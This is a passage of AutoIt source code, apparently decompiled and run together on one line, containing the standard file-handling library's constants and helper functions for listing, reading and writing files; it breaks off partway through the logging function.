$FO_UNICODE = 32 GLOBAL CONST $FO_UTF16_LE = 32 GLOBAL CONST $FO_UTF16_BE = 64 GLOBAL CONST $FO_UTF8 = 128 GLOBAL CONST $FO_UTF8_NOBOM = 256 GLOBAL CONST $FO_ANSI = 512 GLOBAL CONST $FO_UTF16_LE_NOBOM = 1024 GLOBAL CONST $FO_UTF16_BE_NOBOM = 2048 GLOBAL CONST $FO_UTF8_FULL = 16384 GLOBAL CONST $FO_FULLFILE_DETECT = 16384 GLOBAL CONST $EOF = + 4294967295 GLOBAL CONST $FD_FILEMUSTEXIST = 1 GLOBAL CONST $FD_PATHMUSTEXIST = 2 GLOBAL CONST $FD_MULTISELECT = 4 GLOBAL CONST $FD_PROMPTCREATENEW = 8 GLOBAL CONST $FD_PROMPTOVERWRITE = 16 GLOBAL CONST $CREATE_NEW = 1 GLOBAL CONST $CREATE_ALWAYS = 2 GLOBAL CONST $OPEN_EXISTING = 3 GLOBAL CONST $OPEN_ALWAYS = 4 GLOBAL CONST $TRUNCATE_EXISTING = 5 GLOBAL CONST $INVALID_SET_FILE_POINTER = + 4294967295 GLOBAL CONST $FILE_BEGIN = 0 GLOBAL CONST $FILE_CURRENT = 1 GLOBAL CONST $FILE_END = 2 GLOBAL CONST $FILE_ATTRIBUTE_READONLY = 1 GLOBAL CONST $FILE_ATTRIBUTE_HIDDEN = 2 GLOBAL CONST $FILE_ATTRIBUTE_SYSTEM = 4 GLOBAL CONST $FILE_ATTRIBUTE_DIRECTORY = 16 GLOBAL CONST $FILE_ATTRIBUTE_ARCHIVE = 32 GLOBAL CONST $FILE_ATTRIBUTE_DEVICE = 64 GLOBAL CONST $FILE_ATTRIBUTE_NORMAL = 128 GLOBAL CONST $FILE_ATTRIBUTE_TEMPORARY = 256 GLOBAL CONST $FILE_ATTRIBUTE_SPARSE_FILE = 512 GLOBAL CONST $FILE_ATTRIBUTE_REPARSE_POINT = 1024 GLOBAL CONST $FILE_ATTRIBUTE_COMPRESSED = 2048 GLOBAL CONST $FILE_ATTRIBUTE_OFFLINE = 4096 GLOBAL CONST $FILE_ATTRIBUTE_NOT_CONTENT_INDEXED = 8192 GLOBAL CONST $FILE_ATTRIBUTE_ENCRYPTED = 16384 GLOBAL CONST $FILE_SHARE_READ = 1 GLOBAL CONST $FILE_SHARE_WRITE = 2 GLOBAL CONST $FILE_SHARE_DELETE = 4 GLOBAL CONST $FILE_SHARE_READWRITE = BITOR ($FILE_SHARE_READ , $FILE_SHARE_WRITE ) GLOBAL CONST $FILE_SHARE_ANY = BITOR ($FILE_SHARE_READ , $FILE_SHARE_WRITE , $FILE_SHARE_DELETE ) GLOBAL CONST $GENERIC_ALL = 268435456 GLOBAL CONST $GENERIC_EXECUTE = 536870912 GLOBAL CONST $GENERIC_WRITE = 1073741824 GLOBAL CONST $GENERIC_READ = 2147483648 GLOBAL CONST $GENERIC_READWRITE = BITOR ($GENERIC_READ , $GENERIC_WRITE ) GLOBAL CONST $FILE_ENCODING_UTF16LE = 32 GLOBAL CONST $FE_ENTIRE_UTF8 = 1 GLOBAL CONST $FE_PARTIALFIRST_UTF8 = 2 GLOBAL CONST $FN_FULLPATH = 0 GLOBAL CONST $FN_RELATIVEPATH = 1 GLOBAL CONST $FV_COMMENTS = "Comments" GLOBAL CONST $FV_COMPANYNAME = "CompanyName" GLOBAL CONST $FV_FILEDESCRIPTION = "FileDescription" GLOBAL CONST $FV_FILEVERSION = "FileVersion" GLOBAL CONST $FV_INTERNALNAME = "InternalName" GLOBAL CONST $FV_LEGALCOPYRIGHT = "LegalCopyright" GLOBAL CONST $FV_LEGALTRADEMARKS = "LegalTrademarks" GLOBAL CONST $FV_ORIGINALFILENAME = "OriginalFilename" GLOBAL CONST $FV_PRODUCTNAME = "ProductName" GLOBAL CONST $FV_PRODUCTVERSION = "ProductVersion" GLOBAL CONST $FV_PRIVATEBUILD = "PrivateBuild" GLOBAL CONST $FV_SPECIALBUILD = "SpecialBuild" GLOBAL CONST $FRTA_NOCOUNT = 0 GLOBAL CONST $FRTA_COUNT = 1 GLOBAL CONST $FRTA_INTARRAYS = 2 GLOBAL CONST $FRTA_ENTIRESPLIT = 4 GLOBAL CONST $FLTA_FILESFOLDERS = 0 GLOBAL CONST $FLTA_FILES = 1 GLOBAL CONST $FLTA_FOLDERS = 2 GLOBAL CONST $FLTAR_FILESFOLDERS = 0 GLOBAL CONST $FLTAR_FILES = 1 GLOBAL CONST $FLTAR_FOLDERS = 2 GLOBAL CONST $FLTAR_NOHIDDEN = 4 GLOBAL CONST $FLTAR_NOSYSTEM = 8 GLOBAL CONST $FLTAR_NOLINK = 16 GLOBAL CONST $FLTAR_NORECUR = 0 GLOBAL CONST $FLTAR_RECUR = 1 GLOBAL CONST $FLTAR_NOSORT = 0 GLOBAL CONST $FLTAR_SORT = 1 GLOBAL CONST $FLTAR_FASTSORT = 2 GLOBAL CONST $FLTAR_NOPATH = 0 GLOBAL CONST $FLTAR_RELPATH = 1 GLOBAL CONST $FLTAR_FULLPATH = 2 FUNC _FILECOUNTLINES ($SFILEPATH ) LOCAL $HFILEOPEN = FILEOPEN ($SFILEPATH , $FO_READ ) IF $HFILEOPEN = + 4294967295 THEN RETURN SETERROR (1 , 0 , 0 ) LOCAL $SFILEREAD = STRINGSTRIPWS (FILEREAD ($HFILEOPEN ) , $STR_STRIPTRAILING ) FILECLOSE ($HFILEOPEN ) RETURN UBOUND (STRINGREGEXP ($SFILEREAD , "\R" , $STR_REGEXPARRAYGLOBALMATCH ) ) + 1 - INT ($SFILEREAD = "" ) ENDFUNC FUNC _FILECREATE ($SFILEPATH ) LOCAL $HFILEOPEN = FILEOPEN ($SFILEPATH , BITOR ($FO_OVERWRITE , $FO_CREATEPATH ) ) IF $HFILEOPEN = + 4294967295 THEN RETURN SETERROR (1 , 0 , 0 ) LOCAL $IFILEWRITE = FILEWRITE ($HFILEOPEN , "" ) FILECLOSE ($HFILEOPEN ) IF NOT $IFILEWRITE THEN RETURN SETERROR (2 , 0 , 0 ) RETURN 1 ENDFUNC FUNC _FILELISTTOARRAY ($SFILEPATH , $SFILTER = "*" , $IFLAG = $FLTA_FILESFOLDERS , $BRETURNPATH = FALSE ) LOCAL $SDELIMITER = "|" , $SFILELIST = "" , $SFILENAME = "" , $SFULLPATH = "" $SFILEPATH = STRINGREGEXPREPLACE ($SFILEPATH , "[\\/]+$" , "" ) & "\" IF $IFLAG = DEFAULT THEN $IFLAG = $FLTA_FILESFOLDERS IF $BRETURNPATH THEN $SFULLPATH = $SFILEPATH IF $SFILTER = DEFAULT THEN $SFILTER = "*" IF NOT FILEEXISTS ($SFILEPATH ) THEN RETURN SETERROR (1 , 0 , 0 ) IF STRINGREGEXP ($SFILTER , "[\\/:><\|]|(?s)^\s*$" ) THEN RETURN SETERROR (2 , 0 , 0 ) IF NOT ($IFLAG = 0 OR $IFLAG = 1 OR $IFLAG = 2 ) THEN RETURN SETERROR (3 , 0 , 0 ) LOCAL $HSEARCH = FILEFINDFIRSTFILE ($SFILEPATH & $SFILTER ) IF @ERROR THEN RETURN SETERROR (4 , 0 , 0 ) WHILE 1 $SFILENAME = FILEFINDNEXTFILE ($HSEARCH ) IF @ERROR THEN EXITLOOP IF ($IFLAG + @EXTENDED = 2 ) THEN CONTINUELOOP $SFILELIST &= $SDELIMITER & $SFULLPATH & $SFILENAME WEND FILECLOSE ($HSEARCH ) IF $SFILELIST = "" THEN RETURN SETERROR (4 , 0 , 0 ) RETURN STRINGSPLIT (STRINGTRIMLEFT ($SFILELIST , 1 ) , $SDELIMITER ) ENDFUNC FUNC _FILELISTTOARRAYREC ($SFILEPATH , $SMASK = "*" , $IRETURN = $FLTAR_FILESFOLDERS , $IRECUR = $FLTAR_NORECUR , $ISORT = $FLTAR_NOSORT , $IRETURNPATH = $FLTAR_RELPATH ) IF NOT FILEEXISTS ($SFILEPATH ) THEN RETURN SETERROR (1 , 1 , "" ) IF $SMASK = DEFAULT THEN $SMASK = "*" IF $IRETURN = DEFAULT THEN $IRETURN = $FLTAR_FILESFOLDERS IF $IRECUR = DEFAULT THEN $IRECUR = $FLTAR_NORECUR IF $ISORT = DEFAULT THEN $ISORT = $FLTAR_NOSORT IF $IRETURNPATH = DEFAULT THEN $IRETURNPATH = $FLTAR_RELPATH IF $IRECUR > 1 OR NOT ISINT ($IRECUR ) THEN RETURN SETERROR (1 , 6 , "" ) LOCAL $BLONGPATH = FALSE IF STRINGLEFT ($SFILEPATH , 4 ) == "\\?\" THEN $BLONGPATH = TRUE ENDIF LOCAL $SFOLDERSLASH = "" IF STRINGRIGHT ($SFILEPATH , 1 ) = "\" THEN $SFOLDERSLASH = "\" ELSE $SFILEPATH = $SFILEPATH & "\" ENDIF LOCAL $ASFOLDERSEARCHLIST [100 ] = [1 ] $ASFOLDERSEARCHLIST [1 ] = $SFILEPATH LOCAL $IHIDE_HS = 0 , $SHIDE_HS = "" IF BITAND ($IRETURN , 4 ) THEN $IHIDE_HS += 2 $SHIDE_HS &= "H" $IRETURN -= 4 ENDIF IF BITAND ($IRETURN , 8 ) THEN $IHIDE_HS += 4 $SHIDE_HS &= "S" $IRETURN -= 8 ENDIF LOCAL $IHIDE_LINK = 0 IF BITAND ($IRETURN , 16 ) THEN $IHIDE_LINK = 1024 $IRETURN -= 16 ENDIF LOCAL $IMAXLEVEL = 0 IF $IRECUR < 0 THEN STRINGREPLACE ($SFILEPATH , "\" , "" , 0 , $STR_NOCASESENSEBASIC ) $IMAXLEVEL = @EXTENDED - $IRECUR ENDIF LOCAL $SEXCLUDE_LIST = "" , $SEXCLUDE_LIST_FOLDER = "" , $SINCLUDE_LIST = "*" LOCAL $AMASKSPLIT = STRINGSPLIT ($SMASK , "|" ) SWITCH $AMASKSPLIT [0 ] CASE 3 $SEXCLUDE_LIST_FOLDER = $AMASKSPLIT [3 ] CONTINUECASE CASE 2 $SEXCLUDE_LIST = $AMASKSPLIT [2 ] CONTINUECASE CASE 1 $SINCLUDE_LIST = $AMASKSPLIT [1 ] ENDSWITCH LOCAL $SINCLUDE_FILE_MASK = ".+" IF $SINCLUDE_LIST <> "*" THEN IF NOT __FLTAR_LISTTOMASK ($SINCLUDE_FILE_MASK , $SINCLUDE_LIST ) THEN RETURN SETERROR (1 , 2 , "" ) ENDIF LOCAL $SINCLUDE_FOLDER_MASK = ".+" SWITCH $IRETURN CASE 0 SWITCH $IRECUR CASE 0 $SINCLUDE_FOLDER_MASK = $SINCLUDE_FILE_MASK ENDSWITCH CASE 2 $SINCLUDE_FOLDER_MASK = $SINCLUDE_FILE_MASK ENDSWITCH LOCAL $SEXCLUDE_FILE_MASK = ":" IF $SEXCLUDE_LIST <> "" THEN IF NOT __FLTAR_LISTTOMASK ($SEXCLUDE_FILE_MASK , $SEXCLUDE_LIST ) THEN RETURN SETERROR (1 , 3 , "" ) ENDIF LOCAL $SEXCLUDE_FOLDER_MASK = ":" IF $IRECUR THEN IF $SEXCLUDE_LIST_FOLDER THEN IF NOT __FLTAR_LISTTOMASK ($SEXCLUDE_FOLDER_MASK , $SEXCLUDE_LIST_FOLDER ) THEN RETURN SETERROR (1 , 4 , "" ) ENDIF IF $IRETURN = 2 THEN $SEXCLUDE_FOLDER_MASK = $SEXCLUDE_FILE_MASK ENDIF ELSE $SEXCLUDE_FOLDER_MASK = $SEXCLUDE_FILE_MASK ENDIF IF NOT ($IRETURN = 0 OR $IRETURN = 1 OR $IRETURN = 2 ) THEN RETURN SETERROR (1 , 5 , "" ) IF NOT ($ISORT = 0 OR $ISORT = 1 OR $ISORT = 2 ) THEN RETURN SETERROR (1 , 7 , "" ) IF NOT ($IRETURNPATH = 0 OR $IRETURNPATH = 1 OR $IRETURNPATH = 2 ) THEN RETURN SETERROR (1 , 8 , "" ) IF $IHIDE_LINK THEN LOCAL $TFILE_DATA = DLLSTRUCTCREATE ("struct;align 4;dword FileAttributes;uint64 CreationTime;uint64 LastAccessTime;uint64 LastWriteTime;" & "dword FileSizeHigh;dword FileSizeLow;dword Reserved0;dword Reserved1;wchar FileName[260];wchar AlternateFileName[14];endstruct" ) LOCAL $HDLL = DLLOPEN ("kernel32.dll" ) , $ADLL_RET ENDIF LOCAL $ASRETURNLIST [100 ] = [0 ] LOCAL $ASFILEMATCHLIST = $ASRETURNLIST , $ASROOTFILEMATCHLIST = $ASRETURNLIST , $ASFOLDERMATCHLIST = $ASRETURNLIST LOCAL $BFOLDER = FALSE , $HSEARCH = 0 , $SCURRENTPATH = "" , $SNAME = "" , $SRETPATH = "" LOCAL $IATTRIBS = 0 , $SATTRIBS = "" LOCAL $ASFOLDERFILESECTIONLIST [100 ] [2 ] = [[0 , 0 ] ] WHILE $ASFOLDERSEARCHLIST [0 ] > 0 $SCURRENTPATH = $ASFOLDERSEARCHLIST [$ASFOLDERSEARCHLIST [0 ] ] $ASFOLDERSEARCHLIST [0 ] -= 1 SWITCH $IRETURNPATH CASE 1 $SRETPATH = STRINGREPLACE ($SCURRENTPATH , $SFILEPATH , "" ) CASE 2 IF $BLONGPATH THEN $SRETPATH = STRINGTRIMLEFT ($SCURRENTPATH , 4 ) ELSE $SRETPATH = $SCURRENTPATH ENDIF ENDSWITCH IF $IHIDE_LINK THEN $ADLL_RET = DLLCALL ($HDLL , "handle" , "FindFirstFileW" , "wstr" , $SCURRENTPATH & "*" , "struct*" , $TFILE_DATA ) IF @ERROR OR NOT $ADLL_RET [0 ] THEN CONTINUELOOP ENDIF $HSEARCH = $ADLL_RET [0 ] ELSE $HSEARCH = FILEFINDFIRSTFILE ($SCURRENTPATH & "*" ) IF $HSEARCH = + 4294967295 THEN CONTINUELOOP ENDIF ENDIF IF $IRETURN = 0 AND $ISORT AND $IRETURNPATH THEN __FLTAR_ADDTOLIST ($ASFOLDERFILESECTIONLIST , $SRETPATH , $ASFILEMATCHLIST [0 ] + 1 ) ENDIF $SATTRIBS = "" WHILE 1 IF $IHIDE_LINK THEN $ADLL_RET = DLLCALL ($HDLL , "int" , "FindNextFileW" , "handle" , $HSEARCH , "struct*" , $TFILE_DATA ) IF @ERROR OR NOT $ADLL_RET [0 ] THEN EXITLOOP ENDIF $SNAME = DLLSTRUCTGETDATA ($TFILE_DATA , "FileName" ) IF $SNAME = ".." THEN CONTINUELOOP ENDIF $IATTRIBS = DLLSTRUCTGETDATA ($TFILE_DATA , "FileAttributes" ) IF $IHIDE_HS AND BITAND ($IATTRIBS , $IHIDE_HS ) THEN CONTINUELOOP ENDIF IF BITAND ($IATTRIBS , $IHIDE_LINK ) THEN CONTINUELOOP ENDIF $BFOLDER = FALSE IF BITAND ($IATTRIBS , 16 ) THEN $BFOLDER = TRUE ENDIF ELSE $BFOLDER = FALSE $SNAME = FILEFINDNEXTFILE ($HSEARCH , 1 ) IF @ERROR THEN EXITLOOP ENDIF $SATTRIBS = @EXTENDED IF STRINGINSTR ($SATTRIBS , "D" ) THEN $BFOLDER = TRUE ENDIF IF STRINGREGEXP ($SATTRIBS , "[" & $SHIDE_HS & "]" ) THEN CONTINUELOOP ENDIF ENDIF IF $BFOLDER THEN SELECT CASE $IRECUR < 0 STRINGREPLACE ($SCURRENTPATH , "\" , "" , 0 , $STR_NOCASESENSEBASIC ) IF @EXTENDED < $IMAXLEVEL THEN CONTINUECASE ENDIF CASE $IRECUR = 1 IF NOT STRINGREGEXP ($SNAME , $SEXCLUDE_FOLDER_MASK ) THEN __FLTAR_ADDTOLIST ($ASFOLDERSEARCHLIST , $SCURRENTPATH & $SNAME & "\" ) ENDIF ENDSELECT ENDIF IF $ISORT THEN IF $BFOLDER THEN IF STRINGREGEXP ($SNAME , $SINCLUDE_FOLDER_MASK ) AND NOT STRINGREGEXP ($SNAME , $SEXCLUDE_FOLDER_MASK ) THEN __FLTAR_ADDTOLIST ($ASFOLDERMATCHLIST , $SRETPATH & $SNAME & $SFOLDERSLASH ) ENDIF ELSE IF STRINGREGEXP ($SNAME , $SINCLUDE_FILE_MASK ) AND NOT STRINGREGEXP ($SNAME , $SEXCLUDE_FILE_MASK ) THEN IF $SCURRENTPATH = $SFILEPATH THEN __FLTAR_ADDTOLIST ($ASROOTFILEMATCHLIST , $SRETPATH & $SNAME ) ELSE __FLTAR_ADDTOLIST ($ASFILEMATCHLIST , $SRETPATH & $SNAME ) ENDIF ENDIF ENDIF ELSE IF $BFOLDER THEN IF $IRETURN <> 1 AND STRINGREGEXP ($SNAME , $SINCLUDE_FOLDER_MASK ) AND NOT STRINGREGEXP ($SNAME , $SEXCLUDE_FOLDER_MASK ) THEN __FLTAR_ADDTOLIST ($ASRETURNLIST , $SRETPATH & $SNAME & $SFOLDERSLASH ) ENDIF ELSE IF $IRETURN <> 2 AND STRINGREGEXP ($SNAME , $SINCLUDE_FILE_MASK ) AND NOT STRINGREGEXP ($SNAME , $SEXCLUDE_FILE_MASK ) THEN __FLTAR_ADDTOLIST ($ASRETURNLIST , $SRETPATH & $SNAME ) ENDIF ENDIF ENDIF WEND IF $IHIDE_LINK THEN DLLCALL ($HDLL , "int" , "FindClose" , "ptr" , $HSEARCH ) ELSE FILECLOSE ($HSEARCH ) ENDIF WEND IF $IHIDE_LINK THEN DLLCLOSE ($HDLL ) ENDIF IF $ISORT THEN SWITCH $IRETURN CASE 2 IF $ASFOLDERMATCHLIST [0 ] = 0 THEN RETURN SETERROR (1 , 9 , "" ) REDIM $ASFOLDERMATCHLIST [$ASFOLDERMATCHLIST [0 ] + 1 ] $ASRETURNLIST = $ASFOLDERMATCHLIST __ARRAYDUALPIVOTSORT ($ASRETURNLIST , 1 , $ASRETURNLIST [0 ] ) CASE 1 IF $ASROOTFILEMATCHLIST [0 ] = 0 AND $ASFILEMATCHLIST [0 ] = 0 THEN RETURN SETERROR (1 , 9 , "" ) IF $IRETURNPATH = 0 THEN __FLTAR_ADDFILELISTS ($ASRETURNLIST , $ASROOTFILEMATCHLIST , $ASFILEMATCHLIST ) __ARRAYDUALPIVOTSORT ($ASRETURNLIST , 1 , $ASRETURNLIST [0 ] ) ELSE __FLTAR_ADDFILELISTS ($ASRETURNLIST , $ASROOTFILEMATCHLIST , $ASFILEMATCHLIST , 1 ) ENDIF CASE 0 IF $ASROOTFILEMATCHLIST [0 ] = 0 AND $ASFOLDERMATCHLIST [0 ] = 0 THEN RETURN SETERROR (1 , 9 , "" ) IF $IRETURNPATH = 0 THEN __FLTAR_ADDFILELISTS ($ASRETURNLIST , $ASROOTFILEMATCHLIST , $ASFILEMATCHLIST ) $ASRETURNLIST [0 ] += $ASFOLDERMATCHLIST [0 ] REDIM $ASFOLDERMATCHLIST [$ASFOLDERMATCHLIST [0 ] + 1 ] _ARRAYCONCATENATE ($ASRETURNLIST , $ASFOLDERMATCHLIST , 1 ) __ARRAYDUALPIVOTSORT ($ASRETURNLIST , 1 , $ASRETURNLIST [0 ] ) ELSE LOCAL $ASRETURNLIST [$ASFILEMATCHLIST [0 ] + $ASROOTFILEMATCHLIST [0 ] + $ASFOLDERMATCHLIST [0 ] + 1 ] $ASRETURNLIST [0 ] = $ASFILEMATCHLIST [0 ] + $ASROOTFILEMATCHLIST [0 ] + $ASFOLDERMATCHLIST [0 ] __ARRAYDUALPIVOTSORT ($ASROOTFILEMATCHLIST , 1 , $ASROOTFILEMATCHLIST [0 ] ) FOR $I = 1 TO $ASROOTFILEMATCHLIST [0 ] $ASRETURNLIST [$I ] = $ASROOTFILEMATCHLIST [$I ] NEXT LOCAL $INEXTINSERTIONINDEX = $ASROOTFILEMATCHLIST [0 ] + 1 __ARRAYDUALPIVOTSORT ($ASFOLDERMATCHLIST , 1 , $ASFOLDERMATCHLIST [0 ] ) LOCAL $SFOLDERTOFIND = "" FOR $I = 1 TO $ASFOLDERMATCHLIST [0 ] $ASRETURNLIST [$INEXTINSERTIONINDEX ] = $ASFOLDERMATCHLIST [$I ] $INEXTINSERTIONINDEX += 1 IF $SFOLDERSLASH THEN $SFOLDERTOFIND = $ASFOLDERMATCHLIST [$I ] ELSE $SFOLDERTOFIND = $ASFOLDERMATCHLIST [$I ] & "\" ENDIF LOCAL $IFILESECTIONENDINDEX = 0 , $IFILESECTIONSTARTINDEX = 0 FOR $J = 1 TO $ASFOLDERFILESECTIONLIST [0 ] [0 ] IF $SFOLDERTOFIND = $ASFOLDERFILESECTIONLIST [$J ] [0 ] THEN $IFILESECTIONSTARTINDEX = $ASFOLDERFILESECTIONLIST [$J ] [1 ] IF $J = $ASFOLDERFILESECTIONLIST [0 ] [0 ] THEN $IFILESECTIONENDINDEX = $ASFILEMATCHLIST [0 ] ELSE $IFILESECTIONENDINDEX = $ASFOLDERFILESECTIONLIST [$J + 1 ] [1 ] + 4294967295 ENDIF IF $ISORT = 1 THEN __ARRAYDUALPIVOTSORT ($ASFILEMATCHLIST , $IFILESECTIONSTARTINDEX , $IFILESECTIONENDINDEX ) ENDIF FOR $K = $IFILESECTIONSTARTINDEX TO $IFILESECTIONENDINDEX $ASRETURNLIST [$INEXTINSERTIONINDEX ] = $ASFILEMATCHLIST [$K ] $INEXTINSERTIONINDEX += 1 NEXT EXITLOOP ENDIF NEXT NEXT ENDIF ENDSWITCH ELSE IF $ASRETURNLIST [0 ] = 0 THEN RETURN SETERROR (1 , 9 , "" ) REDIM $ASRETURNLIST [$ASRETURNLIST [0 ] + 1 ] ENDIF RETURN $ASRETURNLIST ENDFUNC FUNC __FLTAR_ADDFILELISTS (BYREF $ASTARGET , $ASSOURCE_1 , $ASSOURCE_2 , $ISORT = 0 ) REDIM $ASSOURCE_1 [$ASSOURCE_1 [0 ] + 1 ] IF $ISORT = 1 THEN __ARRAYDUALPIVOTSORT ($ASSOURCE_1 , 1 , $ASSOURCE_1 [0 ] ) $ASTARGET = $ASSOURCE_1 $ASTARGET [0 ] += $ASSOURCE_2 [0 ] REDIM $ASSOURCE_2 [$ASSOURCE_2 [0 ] + 1 ] IF $ISORT = 1 THEN __ARRAYDUALPIVOTSORT ($ASSOURCE_2 , 1 , $ASSOURCE_2 [0 ] ) _ARRAYCONCATENATE ($ASTARGET , $ASSOURCE_2 , 1 ) ENDFUNC FUNC __FLTAR_ADDTOLIST (BYREF $ALIST , $VVALUE_0 , $VVALUE_1 = + 4294967295 ) IF $VVALUE_1 = + 4294967295 THEN $ALIST [0 ] += 1 IF UBOUND ($ALIST ) <= $ALIST [0 ] THEN REDIM $ALIST [UBOUND ($ALIST ) * 2 ] $ALIST [$ALIST [0 ] ] = $VVALUE_0 ELSE $ALIST [0 ] [0 ] += 1 IF UBOUND ($ALIST ) <= $ALIST [0 ] [0 ] THEN REDIM $ALIST [UBOUND ($ALIST ) * 2 ] [2 ] $ALIST [$ALIST [0 ] [0 ] ] [0 ] = $VVALUE_0 $ALIST [$ALIST [0 ] [0 ] ] [1 ] = $VVALUE_1 ENDIF ENDFUNC FUNC __FLTAR_LISTTOMASK (BYREF $SMASK , $SLIST ) IF STRINGREGEXP ($SLIST , "\\|/|:|\<|\>|\|" ) THEN RETURN 0 $SLIST = STRINGREPLACE (STRINGSTRIPWS (STRINGREGEXPREPLACE ($SLIST , "\s*;\s*" , ";" ) , $STR_STRIPLEADING + $STR_STRIPTRAILING ) , ";" , "|" ) $SLIST = STRINGREPLACE (STRINGREPLACE (STRINGREGEXPREPLACE ($SLIST , "[][$^.{}()+\-]" , "\\$0" ) , "?" , "." ) , "*" , ".*?" ) $SMASK = "(?i)^(" & $SLIST & ")\z" RETURN 1 ENDFUNC FUNC _FILEPRINT ($SFILEPATH , $ISHOW = @SW_HIDE ) IF $ISHOW = DEFAULT THEN $ISHOW = @SW_HIDE RETURN SHELLEXECUTE ($SFILEPATH , "" , @WORKINGDIR , "print" , $ISHOW ) ENDFUNC FUNC _FILEREADTOARRAY ($SFILEPATH , BYREF $VRETURN , $IFLAGS = $FRTA_COUNT , $SDELIMITER = "" ) $VRETURN = 0 IF $IFLAGS = DEFAULT THEN $IFLAGS = $FRTA_COUNT IF $SDELIMITER = DEFAULT THEN $SDELIMITER = "" LOCAL $BEXPAND = TRUE IF BITAND ($IFLAGS , $FRTA_INTARRAYS ) THEN $BEXPAND = FALSE $IFLAGS -= $FRTA_INTARRAYS ENDIF LOCAL $IENTIRE = $STR_CHRSPLIT IF BITAND ($IFLAGS , $FRTA_ENTIRESPLIT ) THEN $IENTIRE = $STR_ENTIRESPLIT $IFLAGS -= $FRTA_ENTIRESPLIT ENDIF LOCAL $INOCOUNT = 0 IF $IFLAGS <> $FRTA_COUNT THEN $IFLAGS = $FRTA_NOCOUNT $INOCOUNT = $STR_NOCOUNT ENDIF IF $SDELIMITER THEN LOCAL $ALINES = FILEREADTOARRAY ($SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , 0 , 0 ) LOCAL $IDIM_1 = UBOUND ($ALINES ) + $IFLAGS IF $BEXPAND THEN LOCAL $IDIM_2 = UBOUND (STRINGSPLIT ($ALINES [0 ] , $SDELIMITER , $IENTIRE + $STR_NOCOUNT ) ) LOCAL $ATEMP_ARRAY [$IDIM_1 ] [$IDIM_2 ] LOCAL $IFIELDS , $ASPLIT FOR $I = 0 TO $IDIM_1 - $IFLAGS + 4294967295 $ASPLIT = STRINGSPLIT ($ALINES [$I ] , $SDELIMITER , $IENTIRE + $STR_NOCOUNT ) $IFIELDS = UBOUND ($ASPLIT ) IF $IFIELDS <> $IDIM_2 THEN RETURN SETERROR (3 , 0 , 0 ) ENDIF FOR $J = 0 TO $IFIELDS + 4294967295 $ATEMP_ARRAY [$I + $IFLAGS ] [$J ] = $ASPLIT [$J ] NEXT NEXT IF $IDIM_2 < 2 THEN RETURN SETERROR (4 , 0 , 0 ) IF $IFLAGS THEN $ATEMP_ARRAY [0 ] [0 ] = $IDIM_1 - $IFLAGS $ATEMP_ARRAY [0 ] [1 ] = $IDIM_2 ENDIF ELSE LOCAL $ATEMP_ARRAY [$IDIM_1 ] FOR $I = 0 TO $IDIM_1 - $IFLAGS + 4294967295 $ATEMP_ARRAY [$I + $IFLAGS ] = STRINGSPLIT ($ALINES [$I ] , $SDELIMITER , $IENTIRE + $INOCOUNT ) NEXT IF $IFLAGS THEN $ATEMP_ARRAY [0 ] = $IDIM_1 - $IFLAGS ENDIF ENDIF $VRETURN = $ATEMP_ARRAY ELSE IF $IFLAGS THEN LOCAL $HFILEOPEN = FILEOPEN ($SFILEPATH , $FO_READ ) IF $HFILEOPEN = + 4294967295 THEN RETURN SETERROR (1 , 0 , 0 ) LOCAL $SFILEREAD = FILEREAD ($HFILEOPEN ) FILECLOSE ($HFILEOPEN ) IF STRINGLEN ($SFILEREAD ) THEN $VRETURN = STRINGREGEXP (@LF & $SFILEREAD , "(?|(\N+)\z|(\N*)(?:\R))" , 3 ) $VRETURN [0 ] = UBOUND ($VRETURN ) + 4294967295 ELSE RETURN SETERROR (2 , 0 , 0 ) ENDIF ELSE $VRETURN = FILEREADTOARRAY ($SFILEPATH ) IF @ERROR THEN $VRETURN = 0 RETURN SETERROR (@ERROR , 0 , 0 ) ENDIF ENDIF ENDIF RETURN 1 ENDFUNC FUNC _FILEWRITEFROMARRAY ($SFILEPATH , CONST BYREF $AARRAY , $IBASE = DEFAULT , $IUBOUND = DEFAULT , $SDELIMITER = "|" ) LOCAL $IRETURN = 0 IF NOT ISARRAY ($AARRAY ) THEN RETURN SETERROR (2 , 0 , $IRETURN ) LOCAL $IDIMS = UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) IF $IDIMS > 2 THEN RETURN SETERROR (4 , 0 , 0 ) LOCAL $ILAST = UBOUND ($AARRAY ) + 4294967295 IF $IUBOUND = DEFAULT OR $IUBOUND > $ILAST THEN $IUBOUND = $ILAST IF $IBASE < 0 OR $IBASE = DEFAULT THEN $IBASE = 0 IF $IBASE > $IUBOUND THEN RETURN SETERROR (5 , 0 , $IRETURN ) IF $SDELIMITER = DEFAULT THEN $SDELIMITER = "|" LOCAL $HFILEOPEN = $SFILEPATH IF ISSTRING ($SFILEPATH ) THEN $HFILEOPEN = FILEOPEN ($SFILEPATH , $FO_OVERWRITE ) IF $HFILEOPEN = + 4294967295 THEN RETURN SETERROR (1 , 0 , $IRETURN ) ENDIF LOCAL $IERROR = 0 $IRETURN = 1 SWITCH $IDIMS CASE 1 FOR $I = $IBASE TO $IUBOUND IF NOT FILEWRITE ($HFILEOPEN , $AARRAY [$I ] & @CRLF ) THEN $IERROR = 3 $IRETURN = 0 EXITLOOP ENDIF NEXT CASE 2 LOCAL $STEMP = "" FOR $I = $IBASE TO $IUBOUND $STEMP = $AARRAY [$I ] [0 ] FOR $J = 1 TO UBOUND ($AARRAY , $UBOUND_COLUMNS ) + 4294967295 $STEMP &= $SDELIMITER & $AARRAY [$I ] [$J ] NEXT IF NOT FILEWRITE ($HFILEOPEN , $STEMP & @CRLF ) THEN $IERROR = 3 $IRETURN = 0 EXITLOOP ENDIF NEXT ENDSWITCH IF ISSTRING ($SFILEPATH ) THEN FILECLOSE ($HFILEOPEN ) RETURN SETERROR ($IERROR , 0 , $IRETURN ) ENDFUNC FUNC _FILEWRITELOG ($SLOGPATH , $SLOGMSG , $IFLAG = + 4294967295 ) LOCAL $IOPENMODE = $FO_APPEND LOCAL $SDATENOW = @YEAR & "-" & @MON & "-" & @MDAY LOCAL $STIMENOW = @HOUR & ":" & @MIN & ":" & @SEC LOCAL $SMSG = $SDATENOW & " " & $STIMENOW & " : " & $SLOGMSG IF $IFLAG = DEFAULT THEN $IFLAG = + 4294967295 IF $IFLAG <> + 4294967295 THEN $IOPENMODE = $FO_OVERWRITE $SMSG &= @CRLF & FILEREAD ($SLOGPATH ) ENDIF LOCAL $HFILEOPEN = $SLOGPATH IF ISSTRING ($SLOGPATH ) THEN $HFILEOPEN = FILEOPEN ($SLOGPATH , 